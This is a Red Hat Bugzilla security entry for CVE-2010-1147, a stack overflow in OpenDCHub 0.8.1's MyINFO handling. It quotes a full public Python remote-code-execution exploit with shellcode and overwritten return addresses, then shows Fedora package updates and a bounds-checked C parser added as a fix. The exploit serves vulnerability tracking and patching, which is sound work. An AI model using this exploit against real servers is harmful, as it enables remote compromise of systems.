Bug 579206 (CVE-2010-1147)
| Summary: | CVE-2010-1147 OpenDCHub v0.8.1: Stack overflow by handling a specially-crafted MyINFO message | | |
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
| Status: | CLOSED ERRATA | QA Contact: | |
| Severity: | medium | Docs Contact: | |
| Priority: | medium | | |
| Version: | unspecified | CC: | singh.roshan08 |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| URL: | http://www.indahax.com/exploits/opendchub-0-8-1-remote-code-execution-exploit#more-600 | | |
| Whiteboard: | | | |
| Fixed In Version: | | Doc Type: | Bug Fix |
| Doc Text: | | Story Points: | --- |
| Clone Of: | | Environment: | |
| Last Closed: | 2021-10-19 09:11:23 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | | Category: | --- |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | | | |
| Bug Depends On: | 579207 | | |
| Bug Blocks: | | | |
Description
Jan Lieskovsky
2010-04-03 09:11:37 UTC
Public PoCs by Pierre posted in [1]:

```python
#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
# OpenDcHub is a direct connect hub for Linux
#
# OpenDcHub doesn't handle a specially crafted MyINFO message, which leads to a stack overflow.
#
# Affected versions :
# OpenDcHub 0.8.1
#
# Platforms :
# Unix
#
# Usage :
# ./exploit.py

import socket

host = '192.168.1.9'
port = 5000

# must not contain \x36 \x53 \x00 bytes
# max shellcode size = 103 bytes, use exploit v2 otherwise
shellcode="\x33\xc9\xb1\x13\xba\xf6\x1d\xe7\xfa\xdb\xde\xd9\x74\x24"
shellcode+="\xf4\x5e\x83\xc6\x04\x31\x56\x0a\x03\xa0\x17\x05\x0f\x7d"
shellcode+="\xf3\x3e\x13\x2e\x40\x92\xbe\xd2\xcf\xf5\x8f\xb4\x02\x75"
shellcode+="\xb4\x66\xf5\xb6\xe3\x97\x37\x51\x9c\x86\x6b\xfb\x0f\xc2"
shellcode+="\x83\x52\xe0\x9b\x45\x17\x6a\xfd\xdd\x55\xea\x58\x59\xbc"
shellcode+="\x5b\x65\xa8\xbf\xd5\xe0\xcb\x90\x8d\x3d\x03\x62\x26\x29"
shellcode+="\x74\xe6\xdf\xc7\x03\x05\x4f\x44\x9d\x2b\xc0\x61\x50\x2b"
shellcode+="\x2b"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("$ValidateNick joseph|")

hax="$MyINFO $ALL joseph "
hax+=shellcode
for i in range(103 - len(shellcode)):
    hax+="A"
hax+="$"
hax+="\x20\x81\x81\x80" # esp
hax+="\xed\xf6\xfe\xbf" # eip
hax+="S:-1|"
s.send(hax)
s.close()

"""
# V2
# more complex version, working too; it has more space for the shellcode
hax="$MyINFO $ALL joseph AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
hax+="\xFF\xFF\xFF\xFE" # local var int len of commands.c:my_info() must be a negative value
hax+="TTTTUUUUVVVVWWWWXXXXYYYYZZZZBBBBCCCCEEEEEEE$"
hax+="\x20\x81\x81\x80" # esp
hax+="\x80\xf7\xfe\xbf" # eip
hax+="\xCC\xCC\xCC\xCC" # useless var
hax+="\x10\xf0\xfe\xbf" # this address + 0x20 will be overwritten by 4 bytes
# shellcode time
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+=shellcode
hax+="|"
"""
```

This issue affects the versions of the opendchub package, as shipped with Fedora releases of 11 and 12.

Please fix.

This is CVE-2010-1147.

I have fixed the bug, and created the RPM, but I forgot to put the CVE ids in the RPM changelog. Do I need to recreate the RPM?

Hi Roshan,

I can see "- New release with fix for buffer overflow" in the Changelog, which should be sufficient. (Some further guide information is also available here: [1] https://bugzilla.redhat.com/show_bug.cgi?id=579207#c0)

But please, when submitting the request to Bodhi, be sure to mention the "CVE-2010-1147" identifier in the "Update Information" field, together with #579206 (this bug) within the "Bugs Fixed" field.

Thanks && Regards, Jan.

--
Jan iankko Lieskovsky / Red Hat Security Response Team

opendchub-0.8.2-1.fc11 has been submitted as an update for Fedora 11.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc11

opendchub-0.8.2-1.fc12 has been submitted as an update for Fedora 12.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc12

opendchub-0.8.2-1.fc13 has been submitted as an update for Fedora 13.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc13

I have deleted these updates; I had uploaded the wrong tarball to sourceforge. Luckily nobody had downloaded it till then. I will update the RPM by today. I am sorry for the inconvenience.

opendchub-0.8.2-2.fc12 has been submitted as an update for Fedora 12.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc12

opendchub-0.8.2-2.fc11 has been submitted as an update for Fedora 11.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc11

opendchub-0.8.2-2.fc13 has been submitted as an update for Fedora 13.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc13

opendchub-0.8.2-2.fc12 has been pushed to the Fedora 12 stable repository. If problems still persist, please make note of it in this bug report.

opendchub-0.8.2-2.fc11 has been pushed to the Fedora 11 stable repository. If problems still persist, please make note of it in this bug report.
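The defect behind this bug is an unchecked copy of the MyINFO description field into a fixed-size stack buffer (the PoC pads it to 103 bytes, and its V2 variant drives a local `int len` negative). The C parser below is an added example, not OpenDCHub's code or anything from this thread: it extracts the nick and description from a `$MyINFO $ALL <nick> <description>$...` line using `size_t` pointer differences and checks each field against its buffer before copying. The struct, the 103-byte `DESC_MAX`, the 32-byte `NICK_MAX` and the `accepts_desc_len` helper are assumptions chosen for the example.

```c
#include <string.h>

#define NICK_MAX 32
#define DESC_MAX 103   /* constructed size: the PoC fills a 103-byte description field */

struct myinfo {        /* hypothetical parsed record, not OpenDCHub's own type */
    char nick[NICK_MAX + 1];
    char desc[DESC_MAX + 1];
};

/* Parse "$MyINFO $ALL <nick> <description>$...". Returns 0 on success, -1 when the
 * line is malformed or a field would not fit its buffer. Every length is a size_t
 * pointer difference, so the negative length the V2 PoC relies on cannot occur. */
int parse_myinfo(const char *msg, size_t msg_len, struct myinfo *out)
{
    static const char prefix[] = "$MyINFO $ALL ";
    const size_t plen = sizeof(prefix) - 1;
    const char *p, *end, *sp, *dollar;
    size_t n;
    if (msg == NULL || out == NULL || msg_len < plen) return -1;
    if (memchr(msg, '\0', msg_len) != NULL) return -1;    /* reject embedded NUL */
    if (memcmp(msg, prefix, plen) != 0) return -1;
    p = msg + plen;
    end = msg + msg_len;
    sp = memchr(p, ' ', (size_t)(end - p));                /* nick ends at a space */
    if (sp == NULL) return -1;
    n = (size_t)(sp - p);
    if (n == 0 || n > NICK_MAX) return -1;
    memcpy(out->nick, p, n); out->nick[n] = '\0';
    p = sp + 1;
    dollar = memchr(p, '$', (size_t)(end - p));            /* description ends at '$' */
    if (dollar == NULL) return -1;
    n = (size_t)(dollar - p);
    if (n > DESC_MAX) return -1;                            /* the bounds check the overflow needs */
    memcpy(out->desc, p, n); out->desc[n] = '\0';
    return 0;
}

/* Test helper: is a line whose description is n bytes of 'A' accepted? */
int accepts_desc_len(size_t n)
{
    char line[512];
    struct myinfo mi;
    const size_t head = sizeof("$MyINFO $ALL joseph ") - 1;
    if (head + n + 1 > sizeof line) return 0;   /* cannot build it; count as rejected */
    memcpy(line, "$MyINFO $ALL joseph ", head);
    memset(line + head, 'A', n);
    line[head + n] = '$';
    return parse_myinfo(line, head + n + 1, &mi) == 0;
}
```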